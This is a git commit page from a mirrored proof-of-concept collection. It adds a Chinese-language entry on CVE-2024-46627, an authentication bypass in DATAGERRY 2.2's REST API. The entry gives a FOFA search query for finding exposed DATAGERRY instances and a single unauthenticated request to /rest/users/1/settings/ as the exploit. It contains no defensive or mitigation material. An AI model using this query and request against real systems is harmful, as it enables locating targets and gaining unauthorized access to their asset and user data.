mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
Merge branch 'main' of https://github.com/wy876/POC
This commit is contained in:
commit
0636dd2093
22
DATAGERRY/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md
Normal file
22
DATAGERRY/DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627).md
Normal file
@ -0,0 +1,22 @@
|
|||||||
|
# DATAGERRY REST API 身份验证绕过漏洞(CVE-2024-46627)
|
||||||
|
|
||||||
|
DATAGERRY是DATAGerry开源的一个开源 CMDB 和资产管理工具。DATAGERRY 2.2版本存在安全漏洞,该漏洞源于存在不正确权限改造,允许攻击者通过精心设计的Web请求绕过权限验证而执行任意命令。
|
||||||
|
|
||||||
|
## fofa
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
title="datagerry"
|
||||||
|
```
|
||||||
|
|
||||||
|
## poc
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
使用浏览器请求
|
||||||
|
http://x.x.x.x/rest/users/1/settings/
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
Loading…
x
Reference in New Issue
Block a user